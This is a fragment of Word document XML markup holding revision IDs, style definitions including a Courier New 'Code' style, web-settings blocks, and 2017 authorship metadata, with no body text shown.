    <w:rsid w:val="006C2454"/>
    <w:rsid w:val="006C76EF"/>
    <w:rsid w:val="006E0F02"/>
    <w:rsid w:val="006E3679"/>
    <w:rsid w:val="006F38E9"/>
    <w:rsid w:val="006F4DE5"/>
    <w:rsid w:val="006F62F2"/>
    <w:rsid w:val="006F6A0D"/>
    <w:rsid w:val="00702D89"/>
    <w:rsid w:val="00707F53"/>
    <w:rsid w:val="00710B44"/>
    <w:rsid w:val="00713A78"/>
    <w:rsid w:val="00725DF4"/>
    <w:rsid w:val="00730085"/>
    <w:rsid w:val="00734C58"/>
    <w:rsid w:val="0073557A"/>
    <w:rsid w:val="0074271C"/>
    <w:rsid w:val="007528AB"/>
    <w:rsid w:val="00761D95"/>
    <w:rsid w:val="00764883"/>
    <w:rsid w:val="00773EC1"/>
    <w:rsid w:val="00775D39"/>
    <w:rsid w:val="00777780"/>
    <w:rsid w:val="007912FF"/>
    <w:rsid w:val="0079299B"/>
    <w:rsid w:val="007940B8"/>
    <w:rsid w:val="007944EB"/>
    <w:rsid w:val="00795EE5"/>
    <w:rsid w:val="007B428B"/>
    <w:rsid w:val="007D193F"/>
    <w:rsid w:val="007F05D8"/>
    <w:rsid w:val="007F707A"/>
    <w:rsid w:val="0080245F"/>
    <w:rsid w:val="00804C1A"/>
    <w:rsid w:val="008332FE"/>
    <w:rsid w:val="008347AF"/>
    <w:rsid w:val="00837CF4"/>
    <w:rsid w:val="0085010A"/>
    <w:rsid w:val="008532F8"/>
    <w:rsid w:val="0085583D"/>
    <w:rsid w:val="00876564"/>
    <w:rsid w:val="00876746"/>
    <w:rsid w:val="008776DD"/>
    <w:rsid w:val="00880B35"/>
    <w:rsid w:val="00882B55"/>
    <w:rsid w:val="00890A38"/>
    <w:rsid w:val="00895A1D"/>
    <w:rsid w:val="008A7A66"/>
    <w:rsid w:val="008C0CDE"/>
    <w:rsid w:val="008C2A42"/>
    <w:rsid w:val="008C364C"/>
    <w:rsid w:val="008C4590"/>
    <w:rsid w:val="008D7203"/>
    <w:rsid w:val="008E10B9"/>
    <w:rsid w:val="008E4959"/>
    <w:rsid w:val="008F27BD"/>
    <w:rsid w:val="008F30B3"/>
    <w:rsid w:val="00901E2C"/>
    <w:rsid w:val="009114FE"/>
    <w:rsid w:val="009146A0"/>
    <w:rsid w:val="00916751"/>
    <w:rsid w:val="0092440E"/>
    <w:rsid w:val="00943F19"/>
    <w:rsid w:val="009478A9"/>
    <w:rsid w:val="0095437C"/>
    <w:rsid w:val="00963588"/>
    <w:rsid w:val="00972146"/>
    <w:rsid w:val="00975EBE"/>
    <w:rsid w:val="00983119"/>
    <w:rsid w:val="00992E42"/>
    <w:rsid w:val="009A3FF5"/>
    <w:rsid w:val="009B037A"/>
    <w:rsid w:val="009B2053"/>
    <w:rsid w:val="009C0C88"/>
    <w:rsid w:val="009C5754"/>
    <w:rsid w:val="009D11AD"/>
    <w:rsid w:val="009D75D6"/>
    <w:rsid w:val="009E1793"/>
    <w:rsid w:val="009E49A9"/>
    <w:rsid w:val="009E519F"/>
    <w:rsid w:val="009F05C8"/>
    <w:rsid w:val="009F105C"/>
    <w:rsid w:val="00A07F55"/>
    <w:rsid w:val="00A11D8F"/>
    <w:rsid w:val="00A12539"/>
    <w:rsid w:val="00A275C0"/>
    <w:rsid w:val="00A31B07"/>
    <w:rsid w:val="00A406FD"/>
    <w:rsid w:val="00A4618F"/>
    <w:rsid w:val="00A520A4"/>
    <w:rsid w:val="00A53BD2"/>
    <w:rsid w:val="00A55A3A"/>
    <w:rsid w:val="00A601A5"/>
    <w:rsid w:val="00A66DC1"/>
    <w:rsid w:val="00A72443"/>
    <w:rsid w:val="00A73CF3"/>
    <w:rsid w:val="00A75280"/>
    <w:rsid w:val="00A84234"/>
    <w:rsid w:val="00A9031D"/>
    <w:rsid w:val="00A927A9"/>
    <w:rsid w:val="00A92F8D"/>
    <w:rsid w:val="00A97AF8"/>
    <w:rsid w:val="00AA1EA9"/>
    <w:rsid w:val="00AC423F"/>
    <w:rsid w:val="00AE3D07"/>
    <w:rsid w:val="00AE6092"/>
    <w:rsid w:val="00AF0509"/>
    <w:rsid w:val="00AF0F79"/>
    <w:rsid w:val="00AF3732"/>
    <w:rsid w:val="00AF72ED"/>
    <w:rsid w:val="00B145C3"/>
    <w:rsid w:val="00B14CE0"/>
    <w:rsid w:val="00B163E8"/>
    <w:rsid w:val="00B24440"/>
    <w:rsid w:val="00B30C3F"/>
    <w:rsid w:val="00B321FB"/>
    <w:rsid w:val="00B32ECB"/>
    <w:rsid w:val="00B446C9"/>
    <w:rsid w:val="00B46F03"/>
    <w:rsid w:val="00B75B34"/>
    <w:rsid w:val="00B8139E"/>
    <w:rsid w:val="00B9177A"/>
    <w:rsid w:val="00B93D56"/>
    <w:rsid w:val="00BA4715"/>
    <w:rsid w:val="00BB39DB"/>
    <w:rsid w:val="00BB7FF8"/>
    <w:rsid w:val="00BC3342"/>
    <w:rsid w:val="00BE4C5C"/>
    <w:rsid w:val="00BF125F"/>
    <w:rsid w:val="00BF218D"/>
    <w:rsid w:val="00BF74C3"/>
    <w:rsid w:val="00C12112"/>
    <w:rsid w:val="00C132D2"/>
    <w:rsid w:val="00C1592A"/>
    <w:rsid w:val="00C16E60"/>
    <w:rsid w:val="00C23FA8"/>
    <w:rsid w:val="00C245A4"/>
    <w:rsid w:val="00C37D1D"/>
    <w:rsid w:val="00C608A9"/>
    <w:rsid w:val="00C71424"/>
    <w:rsid w:val="00C71D50"/>
    <w:rsid w:val="00C71E11"/>
    <w:rsid w:val="00C77796"/>
    <w:rsid w:val="00CA0236"/>
    <w:rsid w:val="00CA156C"/>
    <w:rsid w:val="00CA4ED6"/>
    <w:rsid w:val="00CD3F2E"/>
    <w:rsid w:val="00CD4139"/>
    <w:rsid w:val="00CE08CC"/>
    <w:rsid w:val="00CF05AD"/>
    <w:rsid w:val="00D1056B"/>
    <w:rsid w:val="00D23033"/>
    <w:rsid w:val="00D255A7"/>
    <w:rsid w:val="00D37E79"/>
    <w:rsid w:val="00D4528B"/>
    <w:rsid w:val="00D50F3F"/>
    <w:rsid w:val="00D55CA5"/>
    <w:rsid w:val="00D56726"/>
    <w:rsid w:val="00D66D2C"/>
    <w:rsid w:val="00D7312F"/>
    <w:rsid w:val="00D732D7"/>
    <w:rsid w:val="00D85FFF"/>
    <w:rsid w:val="00DA62FC"/>
    <w:rsid w:val="00DB49DB"/>
    <w:rsid w:val="00DC3493"/>
    <w:rsid w:val="00DD531C"/>
    <w:rsid w:val="00DD58AB"/>
    <w:rsid w:val="00DF1336"/>
    <w:rsid w:val="00DF1A5C"/>
    <w:rsid w:val="00E10118"/>
    <w:rsid w:val="00E12CC5"/>
    <w:rsid w:val="00E15DBE"/>
    <w:rsid w:val="00E17FF6"/>
    <w:rsid w:val="00E24BAB"/>
    <w:rsid w:val="00E255E8"/>
    <w:rsid w:val="00E25AB7"/>
    <w:rsid w:val="00E51040"/>
    <w:rsid w:val="00E57695"/>
    <w:rsid w:val="00E61D17"/>
    <w:rsid w:val="00E7350E"/>
    <w:rsid w:val="00E86BC6"/>
    <w:rsid w:val="00E95EE6"/>
    <w:rsid w:val="00EA6114"/>
    <w:rsid w:val="00EB007D"/>
    <w:rsid w:val="00EB2C6F"/>
    <w:rsid w:val="00EB31EC"/>
    <w:rsid w:val="00EC2217"/>
    <w:rsid w:val="00ED47F2"/>
    <w:rsid w:val="00EF474B"/>
    <w:rsid w:val="00F01168"/>
    <w:rsid w:val="00F02ACA"/>
    <w:rsid w:val="00F1111B"/>
    <w:rsid w:val="00F248E8"/>
    <w:rsid w:val="00F3405F"/>
    <w:rsid w:val="00F41C01"/>
    <w:rsid w:val="00F676F8"/>
    <w:rsid w:val="00F740B6"/>
    <w:rsid w:val="00F75337"/>
    <w:rsid w:val="00F80FB6"/>
    <w:rsid w:val="00F841D7"/>
    <w:rsid w:val="00F8432C"/>
    <w:rsid w:val="00F85832"/>
    <w:rsid w:val="00F91CDD"/>
    <w:rsid w:val="00F933F5"/>
    <w:rsid w:val="00FA00FF"/>
    <w:rsid w:val="00FA61E6"/>
    <w:rsid w:val="00FB0B3E"/>
    <w:rsid w:val="00FC534F"/>
    <w:rsid w:val="00FC7414"/>
    <w:rsid w:val="00FD65B0"/>
    <w:rsid w:val="00FD6906"/>
    <w:rsid w:val="00FE2ACD"/>
    <w:rsid w:val="00FE5B4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75A01"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1C3CDA43-EB59-43EC-88F9-98E4E63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11"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003E6BB5"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003E6BB5"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:ind w:left="284"/>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3E6BB5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003E6BB5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00833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C364C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="008C364C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C2A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A42"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002B7C35"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F05C8"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F62F2"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B2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9B2053"/>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15121">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="189074243">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="18856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008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="713390445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="820542980">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="896361743">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921328504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="960184962">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1077750655">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123502342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1202865530">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1214341789">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1243031857">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="104429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Laurenson</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Matthew Arthur-Jeffery</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2017-02-12T23:09:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-15T19:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-15T20:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>